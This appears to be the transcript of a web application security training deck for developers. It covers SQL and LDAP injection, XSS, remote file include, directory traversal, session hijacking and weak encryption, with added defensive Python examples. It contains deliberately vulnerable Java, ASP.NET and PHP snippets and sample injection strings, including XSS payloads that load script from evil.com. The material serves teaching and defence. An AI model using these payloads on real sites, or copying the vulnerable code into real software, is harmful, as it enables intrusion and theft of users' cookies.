Application and Website Security -- Fundamental Edition
  • 2,008 views

This is the first presentation in the 200 level, specifically targeting developers with a more hardcore training program. This program includes numerous case studies and live demonstrations and is considered technical, but does not require a working knowledge of the languages discussed.

Uploaded via as Microsoft PowerPoint

Usage Rights

© All Rights Reserved

  • The above code illustrates a SQL injection vulnerability
  • The code here is vulnerable to XSS
  • The code here is vulnerable to remote include in two locations
  • The code here is vulnerable to a remote include
  • The code here is vulnerable to directory traversal

Presentation Transcript

  • Application and Website Security – Fundamental Edition. Daniel Owens, IT Security Professional
  • Agenda: Course Introduction; Common Input Validation Flaws; Common Access Control Flaws; Common Encryption Flaws; Tools; Conclusion and Appendices
  • Purpose: drum up interest. Session prerequisites: none.
  • Communication Media and Security Concerns. Communication media: 'wired' networks; 'wireless' networks. Security concerns: the insider; the outsider; the technology; nature.
  • A Note About Security: "Security helps functionality – if it doesn't help functionality, it isn't security." - Daniel Owens
  • Consequences of Poor Security: stolen intellectual property; system downtime; lost productivity; damage to NASA's reputation; lost public confidence; lost revenue; Congressional inquiries.
  • Agenda: Course Introduction; Common Input Validation Flaws; Common Access Control Flaws; Common Encryption Flaws; Tools; Conclusion and Appendices
  • SQL | LDAP Injection. SQL and LDAP injection: the injection of malicious code intended to bypass filtering and execute a query of the attacker's choosing. Can be thwarted using strongly typed variables, parameterized statements, escaping, and whitelists. Example strings include:
      1'1
      %31%27%20%4F%52%20%27%31%27%3D%27%31
      &#49&#39&#32&#79&#82&#32&#39&#49&#39&#61&#39&#49
      *(|(mail=*))
  • Java SQL Injection
      import java.sql.*;

      class Login {
          public static void main(String[] args) throws SQLException {
              Connection conn = null;
              String username = args[0];
              String password = args[1];
              // user input is concatenated straight into the query text
              String query = "SELECT uid, pass FROM users WHERE uid LIKE '" + username + "%'";
              conn = DriverManager.getConnection("jdbc:odbc:logistics", "admin", "LetMeIn");
              Statement stmnt = conn.createStatement();
              ResultSet rs = stmnt.executeQuery(query);
              …
          }
      }
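The slide above concatenates the user name into the query text. The following is an added example (not code from the presentation) that reproduces that defect in Python against an in-memory SQLite table, decodes the slide's URL-encoded sample string, and shows the two defences the deck names, a parameterized statement and a whitelist. The table contents and the uid whitelist rule are constructed for the example; the lookup uses an equality comparison rather than the slide's LIKE so that the slide's own sample string is the one that changes the query.

```python
import re
import sqlite3
from urllib.parse import unquote


# Constructed sample data for the example, not data from the presentation.
def make_db():
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (uid TEXT, pass TEXT)")
    conn.executemany("INSERT INTO users VALUES (?, ?)",
                     [("alice", "h1"), ("bob", "h2"), ("carol", "h3")])
    return conn


def vulnerable_lookup(conn, username):
    # Same defect as the slide's Java: the value is spliced into the SQL text,
    # so a quote character in it ends the literal and the rest becomes SQL.
    query = "SELECT uid, pass FROM users WHERE uid = '" + username + "'"
    return conn.execute(query).fetchall()


def safe_lookup(conn, username):
    # Parameterized statement: the value travels separately from the query,
    # so nothing in it can change the statement's structure.
    return conn.execute("SELECT uid, pass FROM users WHERE uid = ?",
                        (username,)).fetchall()


UID_RULE = re.compile(r"^[A-Za-z0-9_]{1,32}$")   # assumed whitelist for uids


def is_valid_uid(username):
    # Whitelist check, applied before any query is built.
    return bool(UID_RULE.match(username))


# The slide's URL-encoded sample string, decoded as the web server would.
ENCODED = "%31%27%20%4F%52%20%27%31%27%3D%27%31"


def demo():
    conn = make_db()
    decoded = unquote(ENCODED)
    results = {
        "decoded": decoded,
        "vulnerable_benign": vulnerable_lookup(conn, "alice"),
        "vulnerable_injected": vulnerable_lookup(conn, decoded),
        "safe_injected": safe_lookup(conn, decoded),
        "whitelist_rejects": not is_valid_uid(decoded),
    }
    try:
        vulnerable_lookup(conn, "1'1")        # the slide's quote-test string
        results["quote_test"] = "no error"
    except sqlite3.OperationalError:
        results["quote_test"] = "SQL error"   # the input reached the SQL parser
    return results


if __name__ == "__main__":
    for name, value in demo().items():
        print(f"{name}: {value}")
```

The `1'1` string is the cheapest check a reviewer has: a database error on a single quote means input is reaching the SQL parser, which is exactly what the parameterized version never lets happen.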
  • Demonstration 1: SQL Injection (Bypassing Security Checks)
  • Case Study 1: SQL Injection (Owning Networks)
  • Cross-Site Scripting (XSS). XSS: the injection of client-side code. Comes in three kinds: persistent; non-persistent; DOM. Only occurs when user input influences the output. Can be stopped by assuming all input is malicious until proven otherwise through a whitelist. Can lead to a complete system compromise – for
  • Cross-Site Scripting (cont.). XSS (cont.). Sample strings:
      <script src=http://evil.com/attack.js << </script <<
      <link rel="stylesheet" href=http://evil.com/attack.css>
      %3Cscript%3Epref%3Dfunction(a%2Cb){document.write(a%2B%22%20-%3E%20%22%2Bb%2B%22%3Cbr%20%2F%3E%22)%3B}%3B%3C%2Fscript%3E%3Cscript%20src%3D%22view-source%3Aresource%3A%2F%2F%2Fgreprefs%2Fall.js%22%3E%3C%2Fscript%3E
      <img src="" onMouseOver="alert(document.cookie)"; />
  • ASP.NET Cross-Site Scripting (two slides)
      <%@ Page Language="C#" ValidateRequest="false" %>
      <html>
      <script runat="server">
      void btnSubmit_Click(Object sender, EventArgs e)
      {
          // the text box value is written back into the page unencoded
          Response.Write(txtString.Text);
      }
      </script>
      <body>
      <form id="form1" runat="server">
          <asp:TextBox id="txtString" runat="server" Text="<script>alert('hi');</script>" />
          <asp:Button id="btnSubmit" runat="server" OnClick="btnSubmit_Click" Text="Submit" />
      </form>
      </body>
      </html>
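The ASP.NET page above writes the text box value back with no encoding. As an added example (not code from the presentation), the Python below shows the same echo in an unsafe and a safe form, using the slide's `<script>alert('hi');</script>` payload, and adds the whitelist check the deck recommends. The field policy regex is an assumption chosen for the example.

```python
import html
import re

# The slide's sample payload: the TextBox default text echoed back unencoded.
SAMPLE = "<script>alert('hi');</script>"


def render_unsafe(value):
    # Mirrors Response.Write(txtString.Text): the string is emitted as markup.
    return "<p>You entered: " + value + "</p>"


def render_safe(value):
    # Output encoding: every character with meaning in HTML becomes an entity,
    # quotes included, so the value is inert in text and attribute contexts.
    return "<p>You entered: " + html.escape(value, quote=True) + "</p>"


# Assumed whitelist for a "name" field: letters first, then a short run of
# letters, digits, spaces, dots, apostrophes or hyphens. Anything else fails.
NAME_RULE = re.compile(r"^[A-Za-z][A-Za-z0-9 .'-]{0,63}$")


def accept_name(value):
    # Input is malicious until proven otherwise: prove it by shape, not by
    # looking for known-bad substrings.
    return bool(NAME_RULE.match(value))


def contains_active_markup(rendered):
    # Cheap assertion for a test suite: rendered output must never carry a
    # live tag that came from a user-controlled value.
    return bool(re.search(r"<\s*(script|img|link|iframe)\b", rendered, re.I))


if __name__ == "__main__":
    print(render_unsafe(SAMPLE))
    print(render_safe(SAMPLE))
    print(accept_name("Daniel Owens"), accept_name(SAMPLE))
```

Both controls are worth having: the whitelist stops the value at the door for fields with a known shape, and output encoding protects every field, including the ones whose legitimate content must contain `<` or `'`.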
  • Demonstration 2: XSS (Having Fun)
  • Remote File Include/Execution | Code Injection. Remote file include and execution: an attacker tricks the system into including and/or executing arbitrary files. Code injection: an attacker tricks the system into executing arbitrary code by injecting the commands into the code. Both: code of the attacker's choosing is executed. Contrary to popular belief, ANY language can suffer this.
  • PHP Remote File Include
      <?php
      ….
      // both include paths come straight from the query string
      require_once($_GET['config']);
      require_once($_GET['base'] . "/index.php");
      ….
      ?>
  • ASP.NET Remote File Include
      <%
      ….
      ' the URL to fetch is taken straight from the query string
      url = Request.QueryString
      Set xml = Server.CreateObject("Microsoft.XMLHTTP")
      xml.open "GET", url, false
      xml.send ""
      Response.Write xml.responseText
      Set xml = Nothing
      ….
      %>
  • Hidden Elements | Cookies. Hidden elements and cookies: hidden fields and cookies were merely intended to provide data storage without cluttering up the user's view. They do not provide secure storage. They are not immutable storage locations. Neither should contain sensitive information. Both should be considered malicious until proven otherwise. Any data in them should not be directly used for output. Whitelisting should be used to prove innocence.
  • Hidden Elements | Cookies (cont.). Hidden elements and cookies (cont.), as captured from a hidden field:
      &#65533; -575840793 ReferrerUrlQhttps://XXX.XXX.nasa.gov/CMTOOLS/Login.aspx?ReturnUrl=/CMTOOLS/ErrorPage.aspxTextErrorddOnClickreturnconfirm ... 'USERNAME (RandomData)); return false;ddhSetTargetText(ctl00_SimpleSearchForm_User2_InputFieldTextbox, 'USERNAME (<a href=pizza.gov>pizza is good for you</a>USERACCOUNT)); return; fd- ctl00$SimpleSearchForm$User1$UserListGridView<+ &#65533; fd
  • Agenda: Course Introduction; Common Input Validation Flaws; Common Access Control Flaws; Common Encryption Flaws; Tools; Conclusion and Appendices
  • Session Hijacking – Cookie Theft. Cookie theft: the theft of a client's cookies by an attacker. Often possible because of other vulnerabilities – browser flaws (sandboxing), having TRACE enabled, XSS, etc. Can be hampered if mechanisms such as NONCEs are used. NONCEs should be a set of characteristics unique to the specific session – client IP, server IP, server port, user agent string, and other key information. Additional mechanisms include using secure cookies, but this has limited impact.
  • Session Hijacking – Session Fixation. Session fixation: an attacker uses a 'known' session ID. Often, the attacker opens the session and keeps it open while attempting to convince a victim to log in using the known session. This is often a phishing or other social engineering attack. Can be hampered if session IDs are 'rekeyed' on login AND sessions expire and are removed quickly. Difficult to stop if sessions are guessable.
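The two slides above name three server-side controls: a NONCE built from the session's client characteristics, rekeying the session ID on login, and short expiry with prompt removal. The following is an added example (not code from the presentation) of a minimal session store that applies all three. The store layout, the server key and the choice of HMAC-SHA256 for the NONCE are assumptions made for the example.

```python
import hashlib
import hmac
import secrets
import time

SERVER_KEY = secrets.token_bytes(32)   # assumed: a per-deployment secret


def client_nonce(client_ip, server_ip, server_port, user_agent):
    # The slide's NONCE: the characteristics of the specific session, keyed
    # so a cookie copied from one client is rejected when presented by another.
    material = "|".join([client_ip, server_ip, str(server_port), user_agent])
    return hmac.new(SERVER_KEY, material.encode(), hashlib.sha256).hexdigest()


class SessionStore:
    def __init__(self, ttl_seconds=900):
        self.ttl = ttl_seconds
        self.sessions = {}   # session id -> {"nonce", "user", "expires"}

    def create(self, nonce):
        # Unguessable ID: 32 random bytes, URL-safe for a cookie value.
        sid = secrets.token_urlsafe(32)
        self.sessions[sid] = {"nonce": nonce, "user": None,
                              "expires": time.time() + self.ttl}
        return sid

    def validate(self, sid, nonce):
        s = self.sessions.get(sid)
        if s is None or s["expires"] < time.time():
            self.sessions.pop(sid, None)     # expired sessions are removed, not kept
            return None
        if not hmac.compare_digest(s["nonce"], nonce):
            return None                      # presented from a different client
        return s

    def login(self, sid, nonce, user):
        # Rekey on login: whatever ID the browser carried before authentication
        # (possibly one planted by an attacker) is discarded and never becomes
        # an authenticated session.
        if self.validate(sid, nonce) is None:
            return None
        del self.sessions[sid]
        new_sid = self.create(nonce)
        self.sessions[new_sid]["user"] = user
        return new_sid


def fixation_scenario():
    # Constructed walk-through: a pre-login ID is known, the victim logs in,
    # and the known ID is checked afterwards.
    nonce = client_nonce("10.0.0.5", "10.0.0.1", 443, "Mozilla/5.0 (example)")
    store = SessionStore()
    known_sid = store.create(nonce)
    authenticated_sid = store.login(known_sid, nonce, "alice")
    return {
        "known_id_still_valid": store.validate(known_sid, nonce) is not None,
        "new_id_differs": authenticated_sid != known_sid,
        "new_id_user": store.validate(authenticated_sid, nonce)["user"],
    }
```

The NONCE check is deliberately a comparison of keyed digests rather than of the raw strings, so the store never needs to keep client IPs or user-agent strings in clear and a leaked session table does not tell an observer what to imitate.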
  • Demonstration 3: Session Hijacking (Session Fixation)
  • Directory Traversal. Directory traversal: an attacker is able to trick the system into traversing the directory structure. In many instances, arbitrary files can be viewed. Attackers are often attempting to execute a file or gather information. If user input dictates the output, care must be taken to ensure the input is 'valid'. Whitelists become invaluable. In extreme cases, an attacker can actually use this to gain administrator access to the server.
  • PHP Directory Traversal
      <?php
      ….
      $date = $_GET['date'];
      // the file name is built from user input with no check on its contents
      if ($handle = fopen("calendar/$date", "rb")) {
          print(fread($handle, filesize("calendar/$date")));
          fclose($handle);
      }
      ….
      ?>
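Both the PHP traversal above and the remote-include slides earlier have the same root cause: a request parameter is used as a file name or path. The following is an added example (not code from the presentation) of the whitelist approach the deck recommends, in Python: a date parameter is accepted only if it matches the expected shape and still resolves under the calendar directory, and an include is selected by name from a server-owned table rather than by a caller-supplied path. The directory layout, the date format and the configuration table are assumptions constructed for the example.

```python
import os
import re

# Assumed layout: calendar entries live under this directory and a request
# may only pick one of them by name.
CALENDAR_ROOT = os.path.realpath("calendar")

# Whitelist: the only shape a date parameter is allowed to have.
DATE_RULE = re.compile(r"^\d{4}-\d{2}-\d{2}$")


def is_inside(root, candidate):
    # True only if candidate, once '..' and symlinks are resolved, is root or
    # lies beneath it.
    root = os.path.realpath(root)
    candidate = os.path.realpath(candidate)
    return os.path.commonpath([root, candidate]) == root


def calendar_path(date):
    """Return the on-disk path for a calendar entry, or None if the request is invalid."""
    if not DATE_RULE.match(date):       # '../' sequences never get past this line
        return None
    path = os.path.join(CALENDAR_ROOT, date)
    # Second check, independent of the regex: the resolved path must still be
    # under the root, which also holds up if the regex is loosened later.
    if not is_inside(CALENDAR_ROOT, path):
        return None
    return os.path.realpath(path)


def read_calendar(date):
    # Replacement for the slide's fopen/fread: open only a path the checks accepted.
    path = calendar_path(date)
    if path is None:
        return None
    with open(path, "rb") as handle:
        return handle.read()


# Include counterpart: the request names a configuration and the server maps
# the name to a file it owns. The request never supplies a path or a URL.
CONFIG_FILES = {"default": "conf/default.php", "mobile": "conf/mobile.php"}


def config_to_include(name):
    return CONFIG_FILES.get(name)       # unknown name -> None, never an arbitrary file
```

The order matters: the regex rejects almost everything cheaply and gives a clear error, while the containment check is the safety net that does not depend on anyone remembering what the regex was meant to exclude.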
  • Agenda: Course Introduction; Common Input Validation Flaws; Common Access Control Flaws; Common Encryption Flaws; Tools; Conclusion and Appendices
  • Session Hijacking – Spoofing. Spoofing: pretending to be someone else, an attacker attempts to gain the victim's privileges. Comes in three basic forms: blind (write-only); half pipe (read-only); full pipe. Network configuration and other protection mechanisms can make this difficult to defeat (both for the attacker and for the developer).
  • Demonstration 4: Session Hijacking (Spoofing)
  • Case Study 2: Session Hijacking (Spoofing)
  • Weak Encryption | Using Encoding. Weak/home-grown encryption: the use of weak and home-grown encryption has led to the compromise of many systems. It is also what makes session hijacking via spoofing, and man-in-the-middle with bucket brigade and substitution attacks, so trivial. Encoding: the use of algorithms that take output and simply change the format (normally it is the number of bits used per character). This is not secure by any means.
  • Case Study 3: Weak Encryption | Encoding (XOR, SHA, Base64)
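The slides above distinguish encoding from encryption and list XOR and Base64 among the case-study algorithms. The following is an added example (not code from the presentation) that makes the distinction concrete for those two: a Base64 value decodes with no key at all, and a repeating-key XOR "cipher" gives up its key as soon as one plaintext/ciphertext pair is known, after which every other value under that key is readable. The token contents and key are constructed for the example.

```python
import base64


def encode_b64(data: bytes) -> str:
    return base64.b64encode(data).decode("ascii")


def decode_b64(text: str) -> bytes:
    # Encoding only changes representation: no key is involved, so anyone who
    # sees the value reads it back with one library call.
    return base64.b64decode(text)


def xor_bytes(data: bytes, key: bytes) -> bytes:
    # Repeating-key XOR, the typical "home-grown" cipher of the case study.
    return bytes(b ^ key[i % len(key)] for i, b in enumerate(data))


def recover_xor_key(plaintext: bytes, ciphertext: bytes, key_len: int) -> bytes:
    # XOR is its own inverse: ciphertext XOR plaintext returns the keystream,
    # and with a repeating key the first key_len bytes of it are the key.
    stream = bytes(c ^ p for c, p in zip(ciphertext, plaintext))
    return stream[:key_len]


def demo():
    # Constructed values for the example: a cookie-style token and a short key.
    token = b"user=alice;role=user"
    key = b"s3cr3t"
    encoded = encode_b64(token)               # "encrypted" with Base64
    ciphertext = xor_bytes(token, key)        # "encrypted" with XOR
    # A reviewer who knows one token (their own) recovers the shared key...
    recovered = recover_xor_key(token, ciphertext, len(key))
    # ...and can read any other token issued under it.
    other = xor_bytes(b"user=bob;role=admin", key)
    return {
        "base64_round_trip": decode_b64(encoded) == token,
        "key_recovered": recovered == key,
        "other_token": xor_bytes(other, recovered),
    }


if __name__ == "__main__":
    for name, value in demo().items():
        print(f"{name}: {value}")
```

This is why the deck ties weak encryption to spoofing and substitution: a token that can be read and re-encoded by anyone holding one sample offers no more protection than a plain-text cookie, whatever it looks like on the wire.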
  • Agenda: Course Introduction; Common Input Validation Flaws; Common Access Control Flaws; Common Encryption Flaws; Tools; Conclusion and Appendices
  • Security Compass. XSS-Me: a free Firefox plug-in; performs semi-automated XSS attacks against POST fields. SQL Inject-Me: a free Firefox plug-in; performs semi-automated SQL injection attacks against POST fields. Access-Me: a free Firefox plug-in…
  • Other Firefox Add-ons. Web Developer Add-on: free; lets you view source files cleanly and easily; lets you quickly enable and disable things (like cookies, JavaScript, and Meta Refresh); lets you view and modify form fields and cookie data. Tamper Data: free; lets you modify most request data.
  • Fuzzers. BED.pl: free Perl script; performs basic tests of your SERVER. JBroFuzz: free Java application; lets you fuzz any part of an HTTP/HTTPS request in a semi-automated fashion. Powerfuzzer: free and commercial versions (Python script); easy and multi-talented… automated.
  • Other Tools. Sothink SWF Decompiler: decompiles any Adobe Flash or Flux script. Cavaj: free; decompiles any Java program. Nikto: free; provides scans of the website looking for common, basic vulnerabilities and misconfigurations.
  • Agenda: Course Introduction; Common Input Validation Flaws; Common Access Control Flaws; Common Encryption Flaws; Tools; Conclusion and Appendices
  • For More Information. Microsoft Security Site (all audiences): http://www.microsoft.com/security. MSDN Security Site (developers): http://msdn.microsoft.com/security. TechNet Security Site (IT professionals): http://www.microsoft.com/technet/security. SANS Top-20 (IT professionals): http://www.sans.org/top20/
  • For More Information (cont.). Common Weakness Enumeration (CWE)/SANS Top 25 Most Dangerous Programming Errors (developers): http://cwe.mitre.org/top25/index.html. GRC IT Security Office: http://itsecurity.grc.nasa.gov. Most Common Software Errors: http://discussweb.com/software-testing/803-most-common-software-errors.html
  • Acknowledgements. I stole the background from Microsoft. I stole a lot from my experiences and previous writings.